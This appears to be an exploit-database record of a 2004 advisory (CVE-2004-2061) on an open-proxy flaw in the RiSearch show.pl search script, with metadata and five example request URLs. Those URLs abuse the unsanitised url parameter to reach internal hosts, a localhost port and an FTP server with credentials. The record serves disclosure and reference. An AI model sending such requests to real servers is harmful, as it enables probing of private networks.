RiSearch 0.99 /RiSearch Pro 3.2.6 - show.pl Open Proxy Relay
Author: Phil Robinson
type: remote
platform: cgi
port:
date_added: 2004-07-27
date_updated: 2016-10-27
verified: 1
codes: CVE-2004-2061;OSVDB-8265
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/10812/info
RiSearch and RiSearch Pro are reported prone to an open proxy vulnerability. It is reported that the issue presents itself due to a lack of sufficient sanitization performed on user supplied URI parameters.
A remote attacker may exploit this condition in order to launch attacks against local and public services in the context of the site that is hosting the vulnerable script.
http://www.example.com/cgi-bin/search/show.pl?url=http://www.google.com
http://www.example.com/cgi-bin/search/show.pl?url=http://192.168.0.1
http://www.example.com/cgi-bin/search/show.pl?url=http://localhost:8080
http://www.example.com/cgi-bin/search/show.pl?url=ftp://192.168.0.1
http://www.example.com/cgi-bin/search/show.pl?url=ftp://username:password@192.168.0.1